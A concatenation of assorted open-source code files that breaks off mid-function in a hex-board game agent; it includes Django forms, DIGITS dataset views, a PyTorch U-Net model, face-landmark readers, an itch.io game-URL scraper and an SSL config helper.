django.contrib.auth.models import User\n\n\nclass create_post(forms.ModelForm):\n\tclass Meta:\n\t\tmodel=models.Post\n\t\tfields=['title','slug','description','release_date','language','tags','image']\n\nclass create_comment(forms.ModelForm):\n\tpost_obj=forms.ModelChoiceField(\n\t\twidget=forms.HiddenInput,\n\t\tdisabled=True,\n\t\tqueryset=models.Post.objects.all()\n\t)\n\tuser_obj=forms.ModelChoiceField(\n\t\twidget=forms.HiddenInput,\n\t\tdisabled=True,\n\t\tqueryset=User.objects.all()\n\t)\n\tclass Meta:\n\t\tmodel = models.Comment\n\t\tfields = ['post_obj','user_obj','comment_title','ratings','body']","sub_path":"blogs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208804009","text":"# Copyright (c) 2014-2015, NVIDIA CORPORATION. All rights reserved.\n\nimport os\nimport shutil\n\nfrom flask import render_template, request, redirect, url_for, flash\n\nfrom digits import utils\nfrom digits.config import config_option\nfrom digits.webapp import app, scheduler\nfrom digits.dataset import tasks\nfrom forms import ImageClassificationDatasetForm\nfrom job import ImageClassificationDatasetJob\n\nNAMESPACE = '/datasets/images/classification'\n\ndef from_folders(job, form):\n \"\"\"\n Add tasks for creating a dataset by parsing folders of images\n \"\"\"\n job.labels_file = utils.constants.LABELS_FILE\n\n ### Add ParseFolderTask\n\n percent_val = form.folder_pct_val.data\n val_parents = []\n if form.has_val_folder.data:\n percent_val = 0\n\n percent_test = form.folder_pct_test.data\n test_parents = []\n if form.has_test_folder.data:\n percent_test = 0\n\n parse_train_task = tasks.ParseFolderTask(\n job_dir = job.dir(),\n folder = form.folder_train.data,\n percent_val = percent_val,\n percent_test = percent_test,\n )\n job.tasks.append(parse_train_task)\n\n # set parents\n if not form.has_val_folder.data:\n val_parents = [parse_train_task]\n if not form.has_test_folder.data:\n test_parents = [parse_train_task]\n\n if form.has_val_folder.data:\n parse_val_task = tasks.ParseFolderTask(\n job_dir = job.dir(),\n parents = parse_train_task,\n folder = form.folder_val.data,\n percent_val = 100,\n percent_test = 0,\n )\n job.tasks.append(parse_val_task)\n val_parents = [parse_val_task]\n\n if form.has_test_folder.data:\n parse_test_task = tasks.ParseFolderTask(\n job_dir = job.dir(),\n parents = parse_train_task,\n folder = form.folder_test.data,\n percent_val = 0,\n percent_test = 100,\n )\n job.tasks.append(parse_test_task)\n test_parents = [parse_test_task]\n\n ### Add CreateDbTasks\n\n encode = form.encode_images.data\n\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n parents = parse_train_task,\n input_file = utils.constants.TRAIN_FILE,\n db_name = utils.constants.TRAIN_DB,\n image_dims = job.image_dims,\n resize_mode = job.resize_mode,\n encode = encode,\n mean_file = utils.constants.MEAN_FILE_CAFFE,\n labels_file = job.labels_file,\n )\n )\n\n if percent_val > 0 or form.has_val_folder.data:\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n parents = val_parents,\n input_file = utils.constants.VAL_FILE,\n db_name = utils.constants.VAL_DB,\n image_dims = job.image_dims,\n resize_mode = job.resize_mode,\n encode = encode,\n labels_file = job.labels_file,\n )\n )\n\n if percent_test > 0 or form.has_test_folder.data:\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n parents = test_parents,\n input_file = utils.constants.TEST_FILE,\n db_name = utils.constants.TEST_DB,\n image_dims = job.image_dims,\n resize_mode = job.resize_mode,\n encode = encode,\n labels_file = job.labels_file,\n )\n )\n\ndef from_files(job, form):\n \"\"\"\n Add tasks for creating a dataset by reading textfiles\n \"\"\"\n ### labels\n\n request.files[form.textfile_labels_file.name].save(\n os.path.join(job.dir(), utils.constants.LABELS_FILE)\n )\n job.labels_file = utils.constants.LABELS_FILE\n\n\n ### train\n\n request.files[form.textfile_train_images.name].save(\n os.path.join(job.dir(), utils.constants.TRAIN_FILE)\n )\n\n image_folder = form.textfile_train_folder.data.strip()\n if not image_folder:\n image_folder = None\n\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n input_file = utils.constants.TRAIN_FILE,\n db_name = utils.constants.TRAIN_DB,\n image_dims = job.image_dims,\n image_folder= image_folder,\n resize_mode = job.resize_mode,\n mean_file = utils.constants.MEAN_FILE_CAFFE,\n labels_file = job.labels_file,\n )\n )\n\n ### val\n\n if form.textfile_use_val.data:\n request.files[form.textfile_val_images.name].save(\n os.path.join(job.dir(), utils.constants.VAL_FILE)\n )\n\n image_folder = form.textfile_val_folder.data.strip()\n if not image_folder:\n image_folder = None\n\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n input_file = utils.constants.VAL_FILE,\n db_name = utils.constants.VAL_DB,\n image_dims = job.image_dims,\n image_folder= image_folder,\n resize_mode = job.resize_mode,\n labels_file = job.labels_file,\n )\n )\n\n ### test\n\n if form.textfile_use_test.data:\n request.files[form.textfile_test_images.name].save(\n os.path.join(job.dir(), utils.constants.TEST_FILE)\n )\n\n image_folder = form.textfile_test_folder.data.strip()\n if not image_folder:\n image_folder = None\n\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n input_file = utils.constants.TEST_FILE,\n db_name = utils.constants.TEST_DB,\n image_dims = job.image_dims,\n image_folder= image_folder,\n resize_mode = job.resize_mode,\n labels_file = job.labels_file,\n )\n )\n\n\n@app.route(NAMESPACE + '/new', methods=['GET'])\ndef image_classification_dataset_new():\n form = ImageClassificationDatasetForm()\n return render_template('datasets/images/classification/new.html', form=form)\n\n@app.route(NAMESPACE, methods=['POST'])\ndef image_classification_dataset_create():\n form = ImageClassificationDatasetForm()\n if not form.validate_on_submit():\n return render_template('datasets/images/classification/new.html', form=form), 400\n\n job = None\n try:\n job = ImageClassificationDatasetJob(\n name = form.dataset_name.data,\n image_dims = (\n int(form.resize_height.data),\n int(form.resize_width.data),\n int(form.resize_channels.data),\n ),\n resize_mode = form.resize_mode.data\n )\n\n if form.method.data == 'folder':\n from_folders(job, form)\n\n elif form.method.data == 'textfile':\n from_files(job, form)\n\n scheduler.add_job(job)\n return redirect(url_for('datasets_show', job_id=job.id()))\n\n except:\n if job:\n scheduler.delete_job(job)\n raise\n\ndef show(job):\n \"\"\"\n Called from digits.dataset.views.datasets_show()\n \"\"\"\n return render_template('datasets/images/classification/show.html', job=job)\n\n","sub_path":"digits/dataset/images/classification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"15160529","text":"import json\nimport os\nimport shutil\n\nimport status\n\n# -------------------------------------------------------------------------------\n# \n# Make config.json file for each tutorial with meta info\n#\n# - config.userguide_chapter_name : breadcrumb header label\n# - config.tags.title : page title\n# - config.tags.meta_description : meta description\n#\n# -------------------------------------------------------------------------------\n\nNAME=\"make_config\" # name of this script\n\n\n# Get from <head>\ndef get_config_title(head, flags):\n Title = head.findAll('title')\n if not len(Title):\n flags += ['no-title']\n title = \"\"\n elif len(Title)>1:\n flags += ['multiple-titles']\n title = Title[-1].string.replace(\"\\n\",'')\n else:\n title = Title[0].string.replace(\"\\n\",'')\n return title, flags\n\n# Get <meta name=\"description\" > \ndef get_config_meta_description(head, flags):\n Meta = head.findAll('meta')\n Meta_description = [meta for meta in Meta \n if (meta.has_attr('name') and \n meta['name']==\"description\")]\n if not len(Meta_description):\n flags += ['no-meta_description']\n meta_description = \"\"\n elif len(Meta_description)>1:\n flags += ['multiple-meta_descriptions']\n meta_description = Meta_description[-1]['content'].replace(\"\\n\",'')\n else:\n meta_description = Meta_description[0]['content'].replace(\"\\n\",'')\n return meta_description, flags\n\n# Get tutorial name (for breadcrumb) \ndef get_config_tutorial_name(head, flags): #TODO generalize!\n tutorial_name = '' \n flags += ['no-tutorial_name']\n return tutorial_name, flags\n\n# Check if config.json in tree was modified\ndef check_tree_config(tree, config, flags):\n try:\n path_config = os.path.join(tree,'config.json')\n with open(path_config) as f:\n config_old = json.load(f)\n if config_old != config:\n config = config_old\n status.log(NAME,(\n \"Not overwriting `{}`, as modifications were found\"\n ).format(path_config))\n flags = ['show-config']\n if not config['tags']['title']: flags += ['no-title'] \n if not config['tags']['meta_description']: flags += ['no-meta_description'] \n if not config['tutorial_name']: flags += ['no-tutorial_name'] \n except:\n pass\n return config, flags\n\n# Print important flags to screen\ndef print_flags(flags, config, path_html, tree):\n for flag in flags:\n if flag=='show-config':\n status.log(NAME,(\n \"{}/config.json ['tutorial_name']:\\n\\t'{}'\"\n ).format(tree,config['tutorial_name']))\n status.log(NAME,(\n \"{}/config.json ['tags']['title']:\\n\\t'{}'\"\n ).format(tree,config['tags']['title']))\n status.log(NAME,(\n \"{}/config.json ['tags']['meta_description']:\\n\\t'{}'\"\n ).format(tree,config['tags']['meta_description']))\n elif flag=='no-title': \n status.important(NAME,(\n \"There is no <title>\\nin `{}`.\\n\"\n \"Please fill in\\n`{}/config.json`\"\n ).format(path_html,tree))\n elif flag=='multiple-title':\n status.important(NAME,(\n \"There is more than one <title>\\nin `{}`.\\n\"\n \"Picking the last one for\\n`{}/config.json`\"\n ).format(path_html,tree))\n status.log(NAME,(\n 'With last <title> tag, set meta'\n 'title to \"{}\"'\n ).format(config['tags']['title']))\n elif flag=='no-meta_description':\n status.important(NAME,(\n \"There is more than one <meta name='description'> in\\n`{}`.\\n\"\n \"Please fill in\\n`{}/config.json`\"\n ).format(path_html,tree))\n elif flag=='multiple-meta_descriptions':\n status.important(NAME,(\n \"There is more than one <meta name='description'> in\\n`{}`.\\n\"\n \"Picking the last one for\\n`{}/config.json`\"\n ).format(path_html,tree))\n status.log(NAME,(\n 'With last <meta name=\"description\"> tag, '\n 'set meta description to \"{}\"'\n ).format(config['tags']['meta_description']))\n elif flag=='no-tutorial_name':\n status.important(NAME,(\n \"Please fill 'tutorial_name' in\\n`{}/config.json`\"\n ).format(tree))\n else:\n status.log(NAME,(\n 'With <title> tag, set meta title to:\\n\\t\"{}\"'\n ).format(config['tags']['title']))\n status.log(NAME,(\n 'With <meta name=\"description\"> tag, set meta description to:\\n\\t\"{}\"'\n ).format(config['tags']['meta_description']))\n return\n\n# -------------------------------------------------------------------------------\n\n# Make config dictionaries (don't print it here!)\ndef make_config(head, path_html, tree):\n flags = []\n title, flags = get_config_title(head, flags)\n meta_description, flags = get_config_meta_description(head, flags)\n tutorial_name, flags = get_config_tutorial_name(head, flags)\n config = dict(\n tutorial_name=tutorial_name,\n tags=dict(title=title, meta_description=meta_description)\n )\n config, flags = check_tree_config(tree, config, flags)\n print_flags(flags, config, path_html, tree)\n return config\n","sub_path":"_scripts/make_config.py","file_name":"make_config.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"640481994","text":"from functools import partial\nfrom typing import Union, Callable, List\n\nimport torch\nfrom pytorch_toolbelt.modules import ABN, ACT_RELU\nfrom pytorch_toolbelt.modules import encoders as E\nfrom pytorch_toolbelt.modules.decoders import DecoderModule\nfrom pytorch_toolbelt.modules.encoders import EncoderModule\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom ..dataset import OUTPUT_MASK_KEY\n\n__all__ = [\"seresnext50_runet64\", \"hrnet18_runet64\", \"hrnet34_runet64\", \"hrnet48_runet64\", \"densenet121_runet64\"]\n\n\nclass ResidualDoubleConvRelu(nn.Module):\n def __init__(self, in_channels, out_channels):\n super().__init__()\n\n self.residual_path = (\n nn.Conv2d(in_channels, out_channels, kernel_size=1) if in_channels != out_channels else nn.Identity()\n )\n\n self.main_path = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, 3, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n )\n\n def forward(self, x):\n skip = self.residual_path(x)\n x = self.main_path(x)\n return F.relu(skip + x, inplace=True)\n\n\nclass RUnetBottleneckBlock(nn.Module):\n def __init__(self, in_channels, out_channels, block=ResidualDoubleConvRelu, num_blocks=1):\n super().__init__()\n\n blocks = []\n for i in range(num_blocks):\n blocks.append(block(in_channels, out_channels))\n in_channels = out_channels\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, dec, enc):\n x = torch.cat([dec, enc], dim=1)\n x = self.blocks(x)\n return x\n\n\nclass RUnetDecoderBlock(nn.Module):\n def __init__(self, in_channels, middle_channels, out_channels):\n super().__init__()\n self.layer = nn.Sequential(\n nn.Upsample(scale_factor=2),\n nn.Conv2d(in_channels, out_channels, 3, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n )\n\n def forward(self, x):\n return self.layer(x)\n\n\nclass RUNetDecoderV2(DecoderModule):\n def __init__(\n self,\n feature_maps: List[int],\n decoder_features: List[int],\n runet_blocks: List[int],\n mask_channels: int,\n last_upsample_filters=None,\n dropout=0.0,\n abn_block=ABN,\n ):\n super().__init__()\n\n if not isinstance(decoder_features, list):\n decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]\n\n if last_upsample_filters is None:\n last_upsample_filters = decoder_features[0]\n\n self.encoder_features = feature_maps\n self.decoder_features = decoder_features\n self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])\n\n self.bottlenecks = nn.ModuleList(\n [\n RUnetBottleneckBlock(self.encoder_features[-i - 2] + f, f, num_blocks=runet_blocks[i])\n for i, f in enumerate(reversed(self.decoder_features[:]))\n ]\n )\n\n self.output_filters = decoder_features\n\n self.last_upsample = RUnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)\n\n self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)\n\n def get_decoder(self, layer):\n in_channels = (\n self.encoder_features[layer + 1]\n if layer + 1 == len(self.decoder_features)\n else self.decoder_features[layer + 1]\n )\n return RUnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])\n\n def forward(self, feature_maps):\n\n last_dec_out = feature_maps[-1]\n\n x = last_dec_out\n for idx, bottleneck in enumerate(self.bottlenecks):\n rev_idx = -(idx + 1)\n decoder = self.decoder_stages[rev_idx]\n x = decoder(x)\n x = bottleneck(x, feature_maps[rev_idx - 1])\n\n x = self.last_upsample(x)\n\n f = self.final(x)\n\n return f\n\n\nclass RUnetV2SegmentationModel(nn.Module):\n def __init__(\n self,\n encoder: EncoderModule,\n num_classes: int,\n unet_channels: Union[int, List[int]],\n runet_blocks: List[int] = (1, 1, 1, 1),\n last_upsample_filters=None,\n dropout=0.25,\n abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,\n full_size_mask=True,\n ):\n super().__init__()\n self.encoder = encoder\n\n self.decoder = RUNetDecoderV2(\n feature_maps=encoder.output_filters,\n decoder_features=unet_channels,\n runet_blocks=runet_blocks,\n last_upsample_filters=last_upsample_filters,\n mask_channels=num_classes,\n dropout=dropout,\n abn_block=abn_block,\n )\n\n self.full_size_mask = full_size_mask\n\n def forward(self, x):\n features = self.encoder(x)\n\n # Decode mask\n mask = self.decoder(features)\n\n if self.full_size_mask:\n mask = F.interpolate(mask, size=x.size()[2:], mode=\"bilinear\", align_corners=False)\n\n output = {OUTPUT_MASK_KEY: mask}\n return output\n\n\ndef seresnext50_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[64, 128, 256, 256],\n runet_blocks=[3, 3, 3, 3],\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n\n\ndef hrnet18_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.HRNetV2Encoder18(pretrained=pretrained, layers=[1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[64, 128, 256],\n runet_blocks=[3, 3, 3, 3],\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n\n\ndef hrnet34_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.HRNetV2Encoder34(pretrained=pretrained, layers=[1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[128, 128, 256],\n runet_blocks=[3, 3, 3, 3],\n last_upsample_filters=64,\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n\n\ndef hrnet48_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.HRNetV2Encoder48(pretrained=pretrained, layers=[1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[128, 128, 256],\n runet_blocks=[3, 3, 3, 3],\n last_upsample_filters=64,\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n\n\ndef densenet121_runet64(input_channels=3, num_classes=1, dropout=0.0, pretrained=True):\n encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[1, 2, 3, 4])\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n\n return RUnetV2SegmentationModel(\n encoder,\n num_classes=num_classes,\n unet_channels=[128, 128, 256],\n runet_blocks=[3, 3, 3, 3],\n last_upsample_filters=64,\n dropout=dropout,\n abn_block=partial(ABN, activation=ACT_RELU),\n )\n","sub_path":"inria/models/runet.py","file_name":"runet.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"274042856","text":"import os\nimport numpy as np\nfrom numpy import loadtxt\nfrom PIL import Image\n\n### Different reader for different dataset\nclass SelfReader(object):\n \"\"\"\n self contained\n \"\"\"\n @classmethod\n def read(cls, imgPath):\n imgP = imgPath.strip()\n folder, name = os.path.split(imgP)\n file_name,_ = os.path.splitext(name)\n folder, id_name = os.path.split(folder)\n annP = \"%s/Annotations/%s/%s_face.txt\"%(folder,\n id_name,\n file_name)\n \n ### Load the ground truth of shape\n gtShape = loadtxt(annP, comments=\"#\", \n delimiter=\",\",\n unpack=False)\n gtShape = gtShape.astype(np.float32)\n \n ### Load the image data\n img = Image.open(imgP)\n if 'L' != img.mode.upper():\n img = img.convert(\"L\")\n img = np.asarray(img, dtype=np.float32)\n return img, gtShape\n \n \nclass AFLWReader(object):\n @classmethod\n def read(cls, imgPath):\n imgP = imgPath.strip()\n folder, name = os.path.split(imgP)\n file_name,_ = os.path.splitext(name)\n annP = \"%s/%s.pts\"%(folder, file_name)\n \n ### Load the ground truth of shape\n lines = open(annP, 'r').readlines()\n gtShape = []\n for line in lines:\n line = line.strip()\n if not str.isdigit(line[0]):\n continue\n x, y = line.split()\n gtShape.append((x,y))\n \n gtShape = np.asarray(gtShape, dtype=np.float32)\n \n ### Load the image data\n img = Image.open(imgP)\n if 'L' != img.mode.upper():\n img = img.convert(\"L\")\n img = np.asarray(img, dtype=np.uint8)\n return img, gtShape\n \n \n \n \n \n \n\n \n","sub_path":"dator/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556302243","text":"#itch.io has 2855 pages for Windows games as of 10/24/19: 85,649 games\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport os\nimport csv\n\n# function to take care of downloading file\ndef enable_download_headless(browser,download_dir):\n browser.command_executor._commands[\"send_command\"] = (\"POST\", '/session/$sessionId/chromium/send_command')\n params = {'cmd':'Page.setDownloadBehavior', 'params': {'behavior': 'allow', 'downloadPath': download_dir}}\n browser.execute(\"send_command\", params)\n\n# instantiate a chrome options object so you can set the size and headless preference\n# some of these chrome options might be uncessary but I just used a boilerplate\n# change the <path_to_download_default_directory> to whatever your default download folder is located\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\nchrome_options.add_argument(\"--window-size=1920x1080\")\nchrome_options.add_argument(\"--disable-notifications\")\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--verbose')\nchrome_options.add_experimental_option(\"prefs\", {\n \"download.default_directory\": \"/Users/esthergoldstein/Downloads\",\n \"download.prompt_for_download\": False,\n \"download.directory_upgrade\": True,\n \"safebrowsing_for_trusted_sources_enabled\": True,\n \"safebrowsing.enabled\": True\n})\n\n\n# initialize driver object and change the <path_to_chrome_driver> depending on your directory where your chromedriver should be\ndriver = webdriver.Chrome(chrome_options=chrome_options, executable_path=\"/Users/esthergoldstein/itchingtofindsomemalware/chromedriver\")\n\n# change the <path_to_place_downloaded_file> to your directory where you would like to place the downloaded file\ndownload_dir = \"/Users/esthergoldstein/itchingtofindsomemalware/\"\n\n# function to handle setting up headless download\nenable_download_headless(driver, download_dir)\nwith open('itch_game_info.csv', mode='a') as game_info_file:\n i = 0\n writer = csv.writer(game_info_file, delimiter=' ', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['Number, Name','URL',])\n for page in range(1,2856):\n \tdriver.get(\"https://itch.io/games/downloadable/free/platform-windows?page=\"+str(page))\n \tsearch_input = driver.find_elements_by_css_selector(\"a[class='title game_link']\")\n \tfor a_tag in search_input:\n i=i+1\n writer.writerow([i, a_tag.text, a_tag.get_attribute('href')])\n\n\n","sub_path":"itch_urls_windows.py","file_name":"itch_urls_windows.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277111293","text":"import os\nimport ssl\n\nfrom tornado.options import options\n\nfrom blackhole.log import log\n\n\nsslkwargs = {\n 'do_handshake_on_connect': False,\n 'server_side': True,\n 'ssl_version': ssl.PROTOCOL_TLSv1,\n 'keyfile': options.ssl_key,\n 'certfile': options.ssl_cert,\n 'ca_certs': options.ssl_ca_certs_dir,\n 'ciphers': None,\n}\n\n\nclass BlackholeSSLException(Exception):\n \"\"\"A simple Exception class\"\"\"\n pass\n\n\ndef verify_ssl_opts():\n \"\"\"\n Verify our SSL configuration variables are\n correctly set-up.\n \"\"\"\n if not options.ssl_key or not options.ssl_cert:\n raise BlackholeSSLException(\"You need to set an SSL certificate and SSL key\")\n if not os.path.exists(options.ssl_cert):\n raise BlackholeSSLException(\"Certificate '%s' does not exist\" % options.ssl_cert)\n if options.ssl_key and not os.path.exists(options.ssl_key):\n raise BlackholeSSLException(\"Keyfile '%s' does not exist\" % options.ssl_key)\n","sub_path":"blackhole/ssl_utils.py","file_name":"ssl_utils.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"405398858","text":"class Solution:\n def canPlaceFlowers(self, flowerbed, n):\n \"\"\"\n :type flowerbed: List[int]\n :type n: int\n :rtype: bool\n \"\"\"\n\n goodIdx = []\n\n if len(flowerbed) == 1 and flowerbed[0] == 0:\n return n < 2\n\n for i in range(len(flowerbed)):\n if i == 0:\n if flowerbed[i] == 0 and flowerbed[i + 1] == 0:\n goodIdx.append(0)\n else:\n continue\n elif i == len(flowerbed) - 1:\n if flowerbed[i] == 0 and flowerbed[i - 1] == 0 \\\n and ((goodIdx and goodIdx[-1] < i - 1) or not goodIdx):\n goodIdx.append(i)\n else:\n continue\n elif flowerbed[i] == 0 and flowerbed[i - 1] == 0 and flowerbed[i + 1] == 0:\n if goodIdx and goodIdx[-1] == i - 1:\n continue\n else:\n goodIdx.append(i)\n print(goodIdx)\n return len(goodIdx) >= n\n\n\ns = Solution()\na = [1,0,0,0,1]\nprint(s.canPlaceFlowers(a, 1))","sub_path":"python/605_canPlaceFlower.py","file_name":"605_canPlaceFlower.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"339015417","text":"from typing import Coroutine\nimport team_name.gamestate\nimport copy\nimport random\n\nclass Player:\n def __init__(self, player):\n \"\"\"\n Called once at the beginning of a game to initialise this player.\n Set up an internal representation of the game state.\n\n The parameter player is the string \"upper\" (if the instance will\n play as Upper), or the string \"lower\" (if the instance will play\n as Lower).\n \"\"\"\n self.gamestate = team_name.gamestate.GameState(player)\n \n def action(self):\n \"\"\"\n Called at the beginning of each turn. Based on the current state\n of the game, select an action to play this turn.\n \"\"\"\n # put your code here\n\n action = self.minimax_decision()\n\n return action\n\n def update(self, opponent_action, player_action):\n \"\"\"\n Called at the end of each turn to inform this player of both\n players' chosen actions. Update your internal representation\n of the game state.\n The parameter opponent_action is the opponent's chosen action,\n and player_action is this instance's latest chosen action.\n \"\"\"\n self.gamestate.turnnum += 1\n self.gamestate.update(player_action, opponent_action)\n\n # start\n # 判断是否出边界\n def isOutBound(self, r, q) -> bool:\n if q > 4 or q < -4 or r > 4 or r < -4: return True\n if q == -4 and r < 0: return True\n if q == -3 and r < -1: return True\n if q == -2 and r < -2: return True\n if q == -1 and r < -3: return True\n if q == 1 and r > 3: return True\n if q == 2 and r > 2: return True\n if q == 3 and r > 1: return True\n if q == 4 and r > 0:\n return True\n else:\n return False\n\n def find_possible_throw(self,gamestate):\n possible_pos = []\n if gamestate.mythrownum in range(0, 9):\n #从下向上扔\n if gamestate.identity == \"lower\":\n for i in range(0, gamestate.mythrownum + 1):\n for j in range(-4,5):\n if not self.isOutBound(i-4,j):\n possible_pos.append((i - 4, j))\n #从上向下扔\n elif gamestate.identity == \"upper\":\n for i in range(0, gamestate.mythrownum + 1):\n for j in range(-4,5):\n if not self.isOutBound(4-i,j):\n possible_pos.append((4-i,j))\n return possible_pos\n\n def find_op_possible_throw(self,gamestate):\n possible_pos = []\n if gamestate.opthrownum in range(0, 9):\n #敌人是upper从上向下扔\n if gamestate.identity == \"lower\":\n for i in range(0, gamestate.opthrownum + 1):\n for j in range(-4,5):\n if not self.isOutBound(4-i,j):\n possible_pos.append((4-i,j))\n #敌人是lower从下向上扔\n elif gamestate.identity == \"upper\":\n for i in range(0, gamestate.opthrownum + 1):\n for j in range(-4,5):\n if not self.isOutBound(i - 4, j):\n possible_pos.append((i - 4, j))\n return possible_pos\n\n def find_possible_slide(self,isopponent,position,type,gamestate):\n possible_pos = []\n final_pos = []\n i = position[0]\n j = position[1]\n for ni, nj in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1), (i + 1, j - 1), (i - 1, j + 1)]:\n if not self.isOutBound(ni, nj):\n possible_pos.append((ni, nj))\n\n if len(possible_pos) == 6:\n if isopponent:\n tokenlist = list(gamestate.mytokens.values())\n else:\n tokenlist = list(gamestate.optokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n\n nearest_distance = float('inf')\n nearest_pos = None\n for pos in possible_pos:\n for token in tokenlist:\n if type == \"s\":\n if token.type == \"p\":\n tempDistance = self.cal_distance(pos,token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_pos = pos\n if type == \"p\":\n if token.type == \"r\":\n tempDistance = self.cal_distance(pos,token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_pos = pos\n if type == \"r\":\n if token.type == \"s\":\n tempDistance = self.cal_distance(pos,token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_pos = pos\n if nearest_pos != None:\n final_pos.append(nearest_pos)\n possible_pos.remove(nearest_pos)\n resultList=random.sample(range(0,5),3)\n for i in resultList:\n final_pos.append(possible_pos[i])\n else:\n resultList=random.sample(range(0,6),4)\n for i in resultList:\n final_pos.append(possible_pos[i])\n\n return final_pos\n return possible_pos\n\n def find_possible_swing(self, position, center_pos):\n possible_pos = []\n finnal_pos = []\n r, q = position\n for center in center_pos:\n i, j = center\n deltaR = r - i\n deltaQ = q - j\n if deltaR == 1 and deltaQ == 0:\n possible_pos.append(self.find_pos_by_direction(center, \"rightDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"leftDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"left\"))\n elif deltaR == 0 and deltaQ == 1:\n possible_pos.append(self.find_pos_by_direction(center, \"leftUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"leftDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"left\"))\n elif deltaR == -1 and deltaQ == 1:\n possible_pos.append(self.find_pos_by_direction(center, \"rightUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"leftUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"left\"))\n elif deltaR == -1 and deltaQ == 0:\n possible_pos.append(self.find_pos_by_direction(center, \"leftUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"rightUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"right\"))\n elif deltaR == 0 and deltaQ == -1:\n possible_pos.append(self.find_pos_by_direction(center, \"rightUp\"))\n possible_pos.append(self.find_pos_by_direction(center, \"rightDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"right\"))\n elif deltaR == 1 and deltaQ == -1:\n possible_pos.append(self.find_pos_by_direction(center, \"rightDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"leftDown\"))\n possible_pos.append(self.find_pos_by_direction(center, \"right\"))\n if len(possible_pos) != 0:\n finnal_pos.append(random.choice(possible_pos))\n possible_pos = []\n return finnal_pos\n\n # 根据相对位置找能旋转的点\n def find_pos_by_direction(self, position, 